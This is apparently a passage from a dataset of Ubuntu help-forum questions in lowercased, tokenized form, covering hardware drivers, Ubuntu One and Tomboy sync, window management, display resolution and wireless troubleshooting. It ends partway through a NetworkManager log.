22100	usage of inb , inl , inw to access kernel space from user space	could you please give me some user space examples of using inb , inl , inw to access kernel space in ubuntu ? /kanu
22101	how to adjust touchpad edge scroll area in ubuntu ?	i have an acer aspire that i have dual booting xp and ubuntu . on the windows side , the driver allows you to set how close your finger has to be to the edge of the touchpad before it goes into scroll mode . in ubuntu i do n't have the option ( at least in the gui ) to change the scroll area on the pad . is there a conf file or other way to change this ? i 'm constantly getting into the scroll area during normal usage . i would like to leave it on without losing so much pad area to the scroll feature .
22102	meaning of `` i '' in `` mib '' ?	i see the usage of `` mib '' as measure to represent the size in ubuntu . what does mib stand for ? in particular the `` i '' ?
22104	boot error message	i 'm getting following error message at the system boot up . the system takes long time to start and i could not understand what it 's saying and why . the os has recently been installed ( 3 weeks ago ) . the following are the last few line of /var/log/dmesg file . please any one let me know if it could be resolved . thank you ! [ 10.049830 ] type=1505 audit ( 1295344306.586:13 ) : operation= '' profile_replace '' pid=850 name=/usr/share/gdm/guest-session/xsession [ 10.051165 ] type=1505 audit ( 1295344306.586:14 ) : operation= '' profile_replace '' pid=851 name=/sbin/dhclient3 [ 10.051744 ] type=1505 audit ( 1295344306.586:15 ) : operation= '' profile_replace '' pid=851 name=/usr/lib/networkmanager/nm-dhcp-client.action [ 10.052058 ] type=1505 audit ( 1295344306.590:16 ) : operation= '' profile_replace '' pid=851 name=/usr/lib/connman/scripts/dhclient-script [ 10.055205 ] type=1505 audit ( 1295344306.590:17 ) : operation= '' profile_replace '' pid=852 name=/usr/bin/evince [ 10.064843 ] type=1505 audit ( 1295344306.602:18 ) : operation= '' profile_replace '' pid=852 name=/usr/bin/evince-previewer [ 10.070323 ] type=1505 audit ( 1295344306.606:19 ) : operation= '' profile_replace '' pid=852 name=/usr/bin/evince-thumbnailer [ 10.078696 ] type=1505 audit ( 1295344306.614:20 ) : operation= '' profile_replace '' pid=854 name=/usr/lib/cups/backend/cups-pdf [ 10.079377 ] type=1505 audit ( 1295344306.614:21 ) : operation= '' profile_replace '' pid=854 name=/usr/sbin/cupsd [ 10.081306 ] type=1505 audit ( 1295344306.618:22 ) : operation= '' profile_replace '' pid=855 name=/usr/sbin/mysqld [ 19.476007 ] eth0 : no ipv6 routers present [ 42.816048 ] ata3 : lost interrupt ( status 0x50 ) [ 42.816073 ] ata3.00 : exception emask 0x10 sact 0x0 serr 0x4850002 action 0xe frozen [ 42.816162 ] ata3 : serror : { recovcomm phyrdychg commwake linkseq devexch } [ 42.816229 ] ata3.00 : cmd c8/00:20 : f7:2c : a0/00:00:00:00:00/e2 tag 0 dma 16384 in [ 42.816230 ] res 40/00:00:00:00:00/00:00:00:00:00/00 emask 0x14 ( ata bus error ) [ 42.816311 ] ata3.00 : status : { drdy } [ 42.816337 ] ata3 : hard resetting link [ 43.700050 ] ata3 : sata link up 3.0 gbps ( sstatus 123 scontrol 300 ) [ 43.732364 ] ata3.00 : configured for udma/133 [ 43.732371 ] ata3.00 : device reported invalid chs sector 0 [ 43.732381 ] ata3 : eh complete [ 74.804023 ] ata3 : lost interrupt ( status 0x50 ) [ 74.804049 ] ata3.00 : exception emask 0x10 sact 0x0 serr 0x40d0002 action 0xe frozen [ 74.804137 ] ata3 : serror : { recovcomm phyrdychg commwake 10b8b devexch } [ 74.804217 ] ata3.00 : cmd c8/00:20:9f : a6 : a1/00:00:00:00:00/e2 tag 0 dma 16384 in [ 74.804218 ] res 40/00:00:00:00:00/00:00:00:00:00/00 emask 0x14 ( ata bus error ) [ 74.804296 ] ata3.00 : status : { drdy } [ 74.804322 ] ata3 : hard resetting link [ 75.684548 ] ata3 : sata link up 3.0 gbps ( sstatus 123 scontrol 300 ) [ 75.716346 ] ata3.00 : configured for udma/133 [ 75.716353 ] ata3.00 : device reported invalid chs sector 0 [ 75.716363 ] ata3 : eh complete [ 106.804020 ] ata3 : lost interrupt ( status 0x50 ) [ 106.804045 ] ata3.00 : exception emask 0x10 sact 0x0 serr 0x4050002 action 0xe frozen [ 106.804132 ] ata3 : serror : { recovcomm phyrdychg commwake devexch } [ 106.804209 ] ata3.00 : cmd c8/00:18:87 : c0 : cc/00:00:00:00:00/e1 tag 0 dma 12288 in [ 106.804210 ] res 40/00:00:00:00:00/00:00:00:00:00/00 emask 0x14 ( ata bus error ) [ 106.804288 ] ata3.00 : status : { drdy } [ 106.804313 ] ata3 : hard resetting link [ 107.684547 ] ata3 : sata link up 3.0 gbps ( sstatus 123 scontrol 300 ) [ 107.716346 ] ata3.00 : configured for udma/133 [ 107.716352 ] ata3.00 : device reported invalid chs sector 0 [ 107.716362 ] ata3 : eh complete [ 138.804019 ] ata3 : lost interrupt ( status 0x50 ) [ 138.804043 ] ata3 : limiting sata link speed to 1.5 gbps [ 138.804050 ] ata3.00 : exception emask 0x10 sact 0x0 serr 0x40d0002 action 0xe frozen [ 138.804137 ] ata3 : serror : { recovcomm phyrdychg commwake 10b8b devexch } [ 138.804215 ] ata3.00 : cmd c8/00:10:07:42 : aa/00:00:00:00:00/e2 tag 0 dma 8192 in [ 138.804216 ] res 40/00:00:00:00:00/00:00:00:00:00/00 emask 0x14 ( ata bus error ) [ 138.804294 ] ata3.00 : status : { drdy } [ 138.804320 ] ata3 : hard resetting link [ 139.684548 ] ata3 : sata link up 1.5 gbps ( sstatus 113 scontrol 310 ) [ 139.716341 ] ata3.00 : configured for udma/133 [ 139.716348 ] ata3.00 : device reported invalid chs sector 0 [ 139.716358 ] ata3 : eh complete [ 170.804017 ] ata3 : lost interrupt ( status 0x50 ) [ 170.804041 ] ata3.00 : exception emask 0x10 sact 0x0 serr 0x48d0002 action 0xe frozen [ 170.804129 ] ata3 : serror : { recovcomm phyrdychg commwake 10b8b linkseq devexch } [ 170.804214 ] ata3.00 : cmd c8/00:20:97:1a:20/00:00:00:00:00/e2 tag 0 dma 16384 in [ 170.804215 ] res 40/00:00:00:00:00/00:00:00:00:00/00 emask 0x14 ( ata bus error ) [ 170.804293 ] ata3.00 : status : { drdy } [ 170.804319 ] ata3 : hard resetting link [ 171.684548 ] ata3 : sata link up 1.5 gbps ( sstatus 113 scontrol 310 ) [ 171.716360 ] ata3.00 : configured for udma/133 [ 171.716367 ] ata3.00 : device reported invalid chs sector 0 [ 171.716377 ] ata3 : eh complete [ 203.804025 ] ata3 : lost interrupt ( status 0x50 ) [ 203.804051 ] ata3.00 : exception emask 0x10 sact 0x0 serr 0x48d0002 action 0xe frozen [ 203.804141 ] ata3 : serror : { recovcomm phyrdychg commwake 10b8b linkseq devexch } [ 203.804222 ] ata3.00 : cmd c8/00:08:6f:44:81/00:00:00:00:00/e0 tag 0 dma 4096 in [ 203.804223 ] res 40/00:00:00:00:00/00:00:00:00:00/00 emask 0x14 ( ata bus error ) [ 203.804302 ] ata3.00 : status : { drdy } [ 203.804328 ] ata3 : hard resetting link [ 204.684051 ] ata3 : sata link up 1.5 gbps ( sstatus 113 scontrol 310 ) [ 204.716357 ] ata3.00 : configured for udma/133 [ 204.716363 ] ata3.00 : device reported invalid chs sector 0 [ 204.716373 ] ata3 : eh complete
22108	how to control fan speed ?	how can i control fan speed ? on windows there is wonderful program called speedfan .
22111	driver for a ati radeon xpress 200m graphics card ?	i am using ubuntu 10.10. where could i find my graphics card driver for my graphics card ati radeon xpress 200m . thanks in advance .
22117	will the recent intel graphics update be available for maverick and when ?	with regards to the recent quarterly updates xorg/mesa/libva etc . are they coming to maverick and when is this likely to happen .
22118	can i install extra drivers via the command prompt ?	since i ca n't seem to open the additional drivers program ? and how do i know what driver i need to install ?
22119	ubuntu one notifications ?	is it possible to somehow setup ubuntu one to get notifications when something is updated . example : synced : /home/user/workspace/xxx.py /home/user/workspace/ggg.py /home/user/workspace/uuu.py synced notes : mynote1 synced : nothing new so nothing synced . synced notes : nothing new so nothing synced . i restarted as suggested after installing indicator , but still ca n't see it in applet list .
22125	lock tmux session with vlock	i have just installed tmux and vlock . when i try to perform the lock-session command , my terminal flashes and then nothing happens . is there something in my .tmux.conf that must be added to tell tmux that i have a locking utility ? if so , what is it ? in other words : how can i do lock-session with tmux ?
22127	system has gotten very slow of late . how to unearth the problem ?	i have been running processor and memory intensive tasks past 2 weeks . but , even after i stop the run , the system is pathetically slow . a simple operation like opening the terminal by clicking on the icon takes 4 5 seconds . and firefox hangs a lot . i have scp'ed about 60l files from my server ( which is in the next room ) to the local system and it has been running since yesterday morning ( 30 hours and counting ) . how to diagnose what is taking up so much of the available resources that linux feels worse than vista ? for now , i can not restart the system as the scp operation is still running : ( i checked system monitor and it shows cpu1 and cpu2 usage between 20-40 % [ it keeps fluctuating ] . configuration : 64-bit amd processor , 2 gb ram . i ran top to see the swap availability and this is what i saw > total swap : 4095992k . used - > 198872k . free : 3897120k ram availability : 1931136k total , 1493656k used , 437480k free , 753584k buffers . what could be , then , the reason for the pathetic performance ? thanks .
22134	getting a mimo um-710s usb powered 7 inch lcd mini display to work	am interested in a satellite 7-10 '' display for my thinkpad x201 ( in addition to already running lcd and main laptop display ) . i 've seen a bunch of mixed info regarding these devices which use displaylink . has anyone reliably gotten this to work ? if so , how ?
22137	is it possible to change the group list shown on the application launcher ?	i just installed unity , on ubuntu 10.10 , to try it out . i 've tried fiddling with a few things , but i ca n't work out how the applications are grouped and listed . i mean - if i click on the applications in the launcher , we get the list of applications installed , with the option to narrow the selection by group . i.e . |search box|all applications|accessories|games|internet|media|office|system| my question is where that list is generated - my machine is mostly for work , so the games have been uninstalled ( and i get a `` there are no games on this box '' message , which is nice ) , and there 's a stack of other stuff i 'd like to see under a new group of `` work '' or something . obviously , a logical follow-up - how does unity know how to classify the applications into those groups ? is it the info in the .desktop links to them ?
22144	cross platform sync of tomboy and getting a `` connection timed out ''	i 'm trying to sync my tomboy notes between my desktop ( mint9 ) and my laptop ( windows vista ) . i have ubuntu one on both machines and tomboy notes on both machines . the issue comes in when i try to sync the tomboy on my windows machine . i go through the whole process and when i click the `` add this computer '' button , i get this error message in my browser window : unable to connect firefox ca n't establish a connection to the server at localhost:8001 . * the site could be temporarily unavailable or too busy . try again in a few moments . * if you are unable to load any pages , check your computer 's network connection . * if your computer or network is protected by a firewall or proxy , make sure that firefox is permitted to access the web . i 'm not having any issues with syncing files , just tomboy . any help would be greatly appreciated .
22154	how to reset a password from kwallet ?	how to reset a password from kwallet ? i 've read about a kwallet gui that could be installed from synaptic , but i found nothing . actually , it shows a gui asking me the password , so is must have somewhere where i can change this password..
22155	how to uninstall second life installer.sh	how do i uninstall second life i downloaded the second life viewer from install.sh
22156	why are the close , maximize , minimize buttons in opposite order when you have the window maximized ?	where is the consistency.. i do n't know how many times i have hit the maximize button instead of the close button ... this makes no sense what so ever
22157	can networkmanager be used on a server ?	on a desktop machine , there 's a gui component to control the connections . but on a server , usually no user is present . how do i need to configure networkmanager to work on a server ? where are the keys for wlan stored/configured ? how do i tell networkmanager to bring up a connection or take it down again ?
22158	tomboy synchronization with ubuntu one fails	i 'm running ubuntu 10.10 desktop ( amd64 ) . when i attempt to synchronize notes with ubuntu one , i get a dialog indicating that tomboy `` failed to synchronize '' , but does n't list any details . following the suggestion on another entry , i quit tomboy and then ran `` tomboy -- debug '' from the console . the output is below . the error indicates a 404 is returned for the notes urls , however i can load the urls directly in firefox ( after logging into ubuntu one ) and receive a json response which appears normal . i 'm logged into ubuntu one according to system > preferences > ubuntu one . not sure where to go from here ... [ debug 10:43:26.763 ] syncthread using syncserviceaddin : tomboy web [ debug 10:43:26.764 ] building web request for url : https : //one.ubuntu.com/notes//api/1.0/ [ debug 10:43:27.577 ] building web request for url : https : //one.ubuntu.com/notes/api/1.0/user/ [ error 10:43:27.806 ] caught exception . message : the remote server returned an error : ( 404 ) not found . [ error 10:43:27.806 ] stack trace for previous exception : at system.net.httpwebrequest.checkfinalstatus ( system.net.webasyncresult result ) [ 0x00000 ] in < filename unknown > :0 at system.net.httpwebrequest.setresponsedata ( system.net.webconnectiondata data ) [ 0x00000 ] in < filename unknown > :0 [ error 10:43:27.807 ] rest of stack trace for above exception : at system.environment.get_stacktrace ( ) at tomboy.websync.api.oauth.makewebrequest ( requestmethod method , system.string url , system.collections.generic.list`1 parameters , system.string postdata ) at tomboy.websync.api.oauth.webrequest ( requestmethod method , system.string url , system.string postdata ) at tomboy.websync.api.oauth.get ( system.string uri , idictionary`2 queryparameters ) at tomboy.websync.api.userinfo.getuser ( system.string useruri , iwebconnection connection ) at tomboy.websync.websyncserver.beginsynctransaction ( ) at tomboy.sync.syncmanager.synchronizationthread ( ) [ error 10:43:27.807 ] synchronization failed with the following exception : the remote server returned an error : ( 404 ) not found . at system.net.httpwebrequest.checkfinalstatus ( system.net.webasyncresult result ) [ 0x00000 ] in < filename unknown > :0 at system.net.httpwebrequest.setresponsedata ( system.net.webconnectiondata data ) [ 0x00000 ] in < filename unknown > :0 ( tomboy:14075 ) : glib-critical ** : g_source_remove : assertion `tag > 0 ' failed
22159	keep videos from resizing in mplayer	i 'm trying to watch a movie with movie player , but it resizes the movie to fit the window , which messes with the quality . is there a way to keep it from resizing while keeping the window maximized ? =/ .
22160	installing flash during system installation	why is it we do n't give the user the option to install the flash plugin during installation when we do install the fluendo mp3 codec ? flash is just as essential to an average user 's browsing experience as mp3 playback is to their audio experience . are the nature of the restrictions different , or is this just an oversight ?
22163	does/will ubuntu one have a version control system ?	just that . i think it is an important feature to facilitate collaborative work . this was reported as the wishlist bug # 366271
22164	vgaswitcheroo not working on vpc-z12m9e	so i have recently tried to get vgaswitcheroo working in ubuntu 10.10 on my sony vaio vpc-z12m9e and i am now at the state where i can properly boot and use the intel card rather reliably - however there is no `` /sys/kernel/debug/vgaswitcheroo '' directory and after a `` bit '' of googling around it seems that i 'm not alone with this problem ... none of the below kernels work as expected : ubuntus default 2.6.24 kernel which got installed after a update 2.6.37-6 as per adam-magic none of the kernels seems to have other problems earlier reported ( touchpad , sound ... ) so im rather confident this is the right stuff .
22168	how do i enable the terminal bell ?	when using the terminal application in ubuntu i never seem to hear any alerts . how do i turn these sounds on ? i 've tried looking in edit > profile preferences and confirming that `` terminal bell '' is checked ( which it is . ) i 've also checked system > preferences > sound and i 'm using the default ubuntu them with the `` alert volume '' cranked . music and video sound fine . to simulate a bell i 've tried irssi , typing 'echo -e `` \a '' ' , hitting tab and backspace but nothing seems to make a sound . how do i fix this ?
22170	how do you convert many files from .xlsx to .xls ?	what is a way to convert a batch of .xlsx files to .xls format ? i would prefer it to be a command-line solution , but anything is better than opening each manually , and manually saving in the new format . ~~edit~~ so is there a way to get around that error ? errored : leaking python objects bridged to uno for reason pyuno runtime is not initialized , ( the pyuno.bootstrap needs to be called before using any uno classes ) python : tpp.c:63 : __pthread_tpp_change_priority : assertion `new_prio == -1 || ( new_prio > = __sched_fifo_min_prio & & new_prio < = __sched_fifo_max_prio ) ' failed . aborted
22171	can network manager settings be made to survive a reboot ?	when i right click on the nm-applet and choose to disable wireless , it turns wireless off . fair enough , but when i reboot , wireless is magically back on again . that 's just an example , but more generally , in a system with multiple cards , can network manager be made to remember their status ? ( like the way windows will allow you enable/disable a nic ) . i believe that you can disable a nic permanently by editing files , but i 'm hoping for a more ad-hoc situation - if it would just remember my choice , that would be grand .
22174	where does network-manager store wpa keys when `` available to all users '' is ticked ?	when you connect to a new ssid network via the network manager applet , the key for that network is stored in gnome-keyring under the `` login '' keychain . but when you then change ( edit ) that network to be `` available to all users '' , the password moves somewhere else . i 'd like to know where , because if it 's a peap network , that 's effectively your active directory password . background i tick most wifi networks as `` available to all users '' not to actually make them available ( it 's a single-user laptop anyway ) , but rather to prevent anyone from seeing my password for that network in clear text simply by right clicking on the network , clicking on security tab and ticking `` show password '' . this is because when you make a network `` available to all users '' , the act of editing that network triggers a system prompt via policykit . this is the same reason i instantly un-install seahorse after a fresh install . crazy security risk allowing this .
22178	automatically switch to workspace with active application	i currently have 4 workspaces . if i have a pidgin chat window open on one workspace that is currently not active and i get a message in that already open chat window , i want do be able to click on the green envelope symbol in the upper menu-bar and be switched to the workspace the window is situated . currently if i click on the green envelope symbol there will be appear a button on the lower menu-bar on which i have to click to be switched to the other workspace . same with opening links . if in some application i click on a link the last activated firefox window will open the link . even this last active firebox window is on a currently not active workspace , and there is a firefox window on the currently active workspace . so either open the link in the firefox on the currently active workspace , or switch to the workspace on which the link was opened . is/are there any solution ( s ) to this problem ?
22180	less.app like application ?	recently i found out about an os x application called less.app . itâs basically an app to compile and minify *.less files into *.css files and does it in real-time . i want to know or i can archive the same thing in ubuntu and how to go about it .
22183	how does ubuntu one deal with files changed on more than one computer ?	what happens if i edit a file on my desktop pc , and edit the same file on my synchronised laptop which is currently not connected to the internet ? let 's say i have a file called `` jobs.todo '' in `` ~/ubuntu one '' on my desktop , and this contains the following : job 1 : description job 2 : description job 3 : description as i have my laptop connected to the internet , this file will appear on both computers . i disconnect my laptop , and take it away with me on a journey . while i 'm away , i think of another job i have to get done and add it to the file , which will now read : job 1 : description job 2 : description job 3 : description job 4 : description when i get home , i go back to my desktop and think of something else i need to get done , so i add this to the desktop computer 's `` jobs.todo '' file , forgetting that i 'd already altered this file on the laptop . this file will read : job 1 : description job 2 : description job 3 : description job 5 : description and the file will be synchronised with the cloud soon afterwards , because the desktop machine is connected to the internet . some while later , i start up my laptop , it connects itself to the internet wirelessly , and synchronisation with the cloud takes place . i suspect that the desktop version ( with job 5 in it ) will be copied from the cloud , and i will lose the file containing job 4 , because the datestamp on the cloud 's version of the file will be later than that on the laptop
22186	can i make compiz scale plugin show minimized windows ?	can i make the compiz scale plugin show minimized windows as well as maximized ones ? ( i 'm using maverick , if that helps . )
22187	how to fix ctrl and shift problems in games ?	i often had trouble with ctrl and shift modifiers while playing games ( maybe this is gnome specific ) . for example if i press and hold ctrl to crouch and i press 3 to select some gun while crouching i get in game menu ( which is triggered by esc ) .
22193	making custom launchers for kwin commands	is it possibly to make launcher icons for kwin commands ( right now i 'm wanting to make one for expo )
22195	where can i download ubuntu logo assets ?	is there a link where people can get something like an official ubuntu logo assets kit ?
22200	how to uninstall a .deb package ?	suppose i download a .deb package from a website and install it . ( i assume that when i double click the .deb file , the package is installed through a gui that interfaces with dpkg right ? ) how can i uninstall it ?
22207	quickly place a window to another screen using only the keyboard	i know that using alt-f7 , i can use the keyboard to move the window around . i can also use the `` grid '' plugin of compiz to position quickly the window around my current monitor . the grid plugin does n't seem work across monitor however . what i need is a quicker way to move the current window to the other screen . in my current dual-monitor setup , i find myself needing to move the focus window to the other monitor as i focus on working on something else ( and move it back afterward ) . if i use xmonad ( or other tiling managers ) , this would be rather easy . however , many applications that i use ( gnome do , matlab , image viewers , custom apps that i write , ... ) do not work well with a tiling manager . so my question is : is there a shortcut key combination that moves the currently focused window to the other monitor ( and back ) ?
22208	how can i install without a usb drive ?	how can i install ubuntu netbook edition without ceating a usb drive ? can i have windows and ubuntu at the same time ?
22210	menubar text color and firefox black making is unreadable with ambiance . how do i fix this ?	ever since i purged kubuntu-desktop from my ubuntu installation , my firefox menu bar text changed to black . i now have trouble using firefox with the ambiance theme . is there a package or something that may need to be adjusted ?
22213	how come rsync copies files faster than krusader ?	i am trying to copy a .tar.gz file from a remote host . if i mount that host using krusader and copy it takes a lot of time . however , if i use rsync , it is about 5-6 times faster . how come ? is there a way that i can take advantage of this speed while still be using krusader ( or a similar tool ) ?
22214	how does the software center keep track of packages ?	how does the software center keep track of installed packages ? in which files/database ?
22215	why have both /mnt and /media ?	it seems to me that having both /mnt and /media is a little redundant . is there any tangible difference between the two that i 'm not aware of ? is there a standard that most people follow for where to mount things , e.g . use one for certain types of devices , or is this completely subjective ?
22219	does n't boot after installing fglrx for ati 5650	i 'm a complete noob here , i recently bought an hp 3161 with an ati 5650 hd card , when i installed 10.04 lts everything was working fine until i was prompted to activate proprietary driver fglrx , after i did this i could n't reboot ( not even in recovery mode ) until i reinstalled 10.04 , what can i do ? i would appreciate any help since i have n't been able to find anyone with the same problem , thanks .
22221	what is the best file system on top of lvm encryption ?	on my ( early ssd ) laptop i normally choose to put everything in an encrypted lvm because i 'm a bit paranoid . : ) i assume that all of the great performance features of the file systems such as ext4 assume a lot about the distribution of data that simply is n't true when there 's an encryption layer on top . to that end , what is the best file system on top of a layer of encryption ? is it jfs since it `` does less '' and there for is computationally less expensive ?
22224	how to eliminate/deactivate ubuntu one account ?	i want to eliminate my account since i created it only as a trial .
22225	what do `` unamplified '' and `` 100 % '' mean when describing `` output volume '' ?	ubuntu 's sound preferences dialog ( the one you get to by clicking on the little speaker icon in the indicator applet ) has a couple notches on the slider , one marked `` unamplified '' and one marked `` 100 % '' . and the thing does n't stop at 100 % either . so what does 100 % mean if it does n't mean either `` the signal without amplification '' or `` as loud as i can make it '' ? where do i want it set if i want the strongest signal sent to my speakers without danger of clipping ?
22230	window management shortcuts ?	i 've got a single massive monitor at home , and i 've decided to mimic the windows 7 window tiling shortcuts . i found a few guides online using wmctrl , and it 's going well , save one thing : maximized windows do n't respond to it . gconftool-2 -- type string -- set /apps/metacity/keybinding_commands/command_1 '' wmctrl -r : active : -e 0 , 0,0 , `xwininfo -root | grep width | awk ' { print ( $ 2/2 ) } '` , `xwininfo -root | grep height | awk ' { print $ 2 } '` '' ( i 've added line returns to make an otherwise massive one-liner readable . ) i 've bound this to a hotkey and it works , unless the window is maximized . any ideas on how to fix this up ?
22231	logitech gamepad f310 interacts with mouse ... why ?	i downloaded the n64 emulator off of the software center a while ago , and i was doing ok with using the keyboard . then a friend of mine gave me the brilliant idea of getting a usb controller . so i got it and it was working fine with the mupen64plus , the gfce ultra nes , and the zsnes emulators , until i got the rom for turok . the controls are different in that game than the others , and utilizes the four yellow `` c '' buttons that would be on a n64 controller . the logitech ( f310 if it might be useful to know ) i got , looks much more like a ps2 or ps3 controller ... four buttons on the right , 2 360 directional sticks that push down as a separate button , etc.. so turok uses the four yellow `` c '' buttons as the main movement for it 's character . i do n't have so many buttons so i started to mess with using the `` u '' and `` v '' axis 360 directional stick . all of a sudden , the controller started to manipulate the cursor , and before i knew it the mouse arrow was sliding to the top left corner of the screen . it would n't interact with the controller anymore , and the mouse itself , when moved , would move with great resistance back to the top left corner of the screen . my immediate solution solution was to unplug the controller from the usb . now , every time i plug the controller back in , it sends the cursor flailing into the corner of my screen . i 've looked up getting all sorts of `` jscalibrators '' and other junk from the software center and i 've typed stuff into the terminal from other forums , postings that asked similar questions , but it 's been totally hit or miss ... mostly miss . i ca n't quite figure out what to tell the computer to do to stop thinking the gamepad is the mouse . i been get so frustrated about this over the past two days , i 've been taking afternoon naps after researching and fighting for a few hours . logitech support hung up on me before even connecting me to a human . how do i keep the controller from thinking it 's the mouse ?
22232	how to control order of startup items in gnome ?	how would you control the order of startup items in gnome ? for example on my system i have a program called tilda that requires that compiz be loaded so that transparency will work , otherwise if it is n't i have to manually close and reopen the program once it is loaded for the transparency to work . i have tried using the startup applications , and editing the launcher to add sleep 3 & & tilda but this does n't seem to work . so is there anyway to control the order of startup items so that programs that require compiz or some other feature like the notification area ( for dock only setups not using the gnome-panel ) ?
22233	always prompt the user before executing a command in the shell	is there a utility that always prompts the user for confirmation before executing a command similar to the way sudo asks for password ?
22234	how to mount windows partition on boot ?	i 'd like a gui method to set my windows partition to mount on boot , using the same options as when it mounts by me opening it in nautilus .
22237	when will we get sandy bridge support ?	i 'd like to build a machine running ubuntu and using the new sandy bridge ( i5 2500 specifically ) intel cpu 's . i heard that 10.10 does n't have the best support ( or simply wo n't work ) with the new cpus and 1155 mobos . i 'm assuming that 11.04 will have support but do the alpha 's have it already ? or will i have to wait ? also , i plan to use the onboard intel graphics ( h67 mobo ) , will there be support for this or will i still need to use a graphic 's card ?
22240	how to mount daemon tool 's .mdx file ?	how to mount a windows ' daemon tool 's .mdx file in ubuntu ? the scenario is you do n't have windows and want to access the files in .mdx image on ubuntu .
22241	how to add sound to notifyosd ?	i want to hear a sound when notification bubbles pop up . is it possible to add a custom sound ? thanks in advance !
22242	how to get sensor readings for recent hardware ?	how do i best update lm-sensors to work with recent hardware ? i have a fresh install of ubuntu 10.10 server , and get the following : $ sudo apt-get install lm-sensors $ sensors no sensors found ! [ ... ] try sensors-detect [ ... ] $ sudo sensors-detect [ ... ] driver 'to-be-written ' : * chip `` nuvoton w83667hg-b super io sensors '' ( confidence : 9 ) note : there is no driver for [ this sensor ] yet . check http : //www.lm-sensors.org/wiki/devices for updates . the link tells me that this chip is supported from kernel 2.6.36 ( while ubuntu 10.10 is using 2.6.35 ) or by using a standalone driver . what is the simplest way to update lm-sensors ?
22243	how do i set up a new resolution ?	okay , in my gui , ubuntu only allowed me to set a resolution for 1360x768 and 1024x768 even though i know darn well my p76 monitor is capable of 1280x1024 . so , after a little investigation i used cvt and xrandr to figure out that i can add these lines to my /etc/gdm/init/default file ( first four lines are actually one line , i 've just split it for readability ) : xrandr -- newmode 1280x1024 109.00 1280 1368 1496 1712 1024 1027 1034 1063 -hsync +vsync xrandr -- addmode vga1 1280x1024 xrandr -- output vga1 -- mode 1280x1024 now , that works fine , i find that the login screen is actually in 1280x1024 . however , when i actually log in , it reverts to 1024x768 which is a serious pain . the output from xrandr shows : screen 0 : minimum 320 x 200 , current 1024 x 768 , maximum 4096 x 4096 vga1 connected 1024x768+0+0 ( normal left inverted right x axis y axis ) 0mmx0mm 1360x768 59.8 1024x768 60.0* 800x600 60.3 56.2 848x480 60.0 640x480 59.9 59.9 1280x1024 59.9 so i 'm guessing that it 's the fact the preferred resolution is 1024x768 ( since that has the * next to it ) that 's causing my reversion to that resolution . executing : xrandr -- output vga1 -- mode 1280x1024 from a terminal window fixes it but i 'd prefer an automatic solution . how do i set the preferred resolution to be 1280x1024 ( if that is indeed my problem ) ? can this be done with another xrandr command and should this be in /etc/gdm/init/default or somewhere else ?
22247	wireless will not connect with an azurewave chipset	i have installed ubuntu 10.10 on the same machine as my windows setup . however , it will not connect to my wireless network . it can see its there , it can attempt to connect , yet it will never connect . it will keep bringing up the password prompt everyso often . i have tried turning my security to wep , i ended up turning it back to wpa2 . it is set to aes ( noted a few threads on google about that ) . can you assist ? i would love to dive into ubuntu , but without the internet its pointless . lshw -c network *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 02 serial : 00:1d:92 : ea : cc:62 capacity : 1gb/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8168 driverversion=8.020.00-napi duplex=half latency=0 link=no multicast=yes port=twisted pair resources : irq:29 ioport : e800 ( size=256 ) memory : feaff000-feafffff memory : f8ff0000-f8ffffff ( prefetchable ) memory : feac0000-feadffff ( prefetchable ) *-network description : wireless interface physical id : 1 logical name : wlan0 serial : 00:15 : af:72 : a4:38 capabilities : ethernet physical wireless configuration : broadcast=yes multicast=yes wireless=ieee 802.11bgn iwconfig lo no wireless extensions . eth0 no wireless extensions . wlan0 ieee 802.11bgn essid : '' wuggawoo '' mode : managed frequency:2.437 ghz access point : not-associated tx-power=9 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : on cat /etc/network/interfaces auto lo iface lo inet loopback deamon.log jan 19 04:17:09 ubuntu wpa_supplicant [ 1289 ] : authentication with 94:44:52:0d:22:0d timed out . jan 19 04:17:09 ubuntu networkmanager : ( wlan0 ) : supplicant connection state : associating - > disconnected jan 19 04:17:09 ubuntu networkmanager : ( wlan0 ) : supplicant connection state : disconnected - > scanning jan 19 04:17:11 ubuntu wpa_supplicant [ 1289 ] : wps-ap-available jan 19 04:17:11 ubuntu wpa_supplicant [ 1289 ] : trying to associate with 94:44:52:0d:22:0d ( ssid='wuggawoo ' freq=2437 mhz ) jan 19 04:17:11 ubuntu networkmanager : ( wlan0 ) : supplicant connection state : scanning - > associating jan 19 04:17:12 ubuntu networkmanager : activation ( wlan0/wireless ) : association took too long . jan 19 04:17:12 ubuntu networkmanager : ( wlan0 ) : device state change : 5 - > 6 ( reason 0 ) jan 19 04:17:12 ubuntu networkmanager : activation ( wlan0/wireless ) : asking for new secrets jan 19 04:17:12 ubuntu networkmanager : activation ( wlan0 ) stage 1 of 5 ( device prepare ) scheduled ... jan 19 04:17:12 ubuntu networkmanager : activation ( wlan0 ) stage 1 of 5 ( device prepare ) started ... jan 19 04:17:12 ubuntu networkmanager : ( wlan0 ) : device state change : 6 - > 4 ( reason 0 ) jan 19 04:17:12 ubuntu networkmanager : activation ( wlan0 ) stage 2 of 5 ( device configure ) scheduled ... jan 19 04:17:12 ubuntu networkmanager : activation ( wlan0 ) stage 1 of 5 ( device prepare ) complete . jan 19 04:17:12 ubuntu networkmanager : activation ( wlan0 ) stage 2 of 5 ( device configure ) starting ... jan 19 04:17:12 ubuntu networkmanager : ( wlan0 ) : device state change : 4 - > 5 ( reason 0 ) jan 19 04:17:12 ubuntu networkmanager : activation ( wlan0/wireless ) : connection 'wuggawoo ' has security , and secrets exist . no new secrets needed . jan 19 04:17:12 ubuntu networkmanager : config : added 'ssid ' value 'wuggawoo' jan 19 04:17:12 ubuntu networkmanager : config : added 'scan_ssid ' value '1' jan 19 04:17:12 ubuntu networkmanager : config : added 'key_mgmt ' value 'wpa-psk' jan 19 04:17:12 ubuntu networkmanager : config : added 'psk ' value '' jan 19 04:17:12 ubuntu networkmanager : nm_setting_802_1x_get_pkcs11_engine_path : assertion `nm_is_setting_802_1x ( setting ) ' failed jan 19 04:17:12 ubuntu networkmanager : nm_setting_802_1x_get_pkcs11_module_path : assertion `nm_is_setting_802_1x ( setting ) ' failed jan 19 04:17:12 ubuntu networkmanager : activation ( wlan0 ) stage 2 of 5 ( device configure ) complete . jan 19 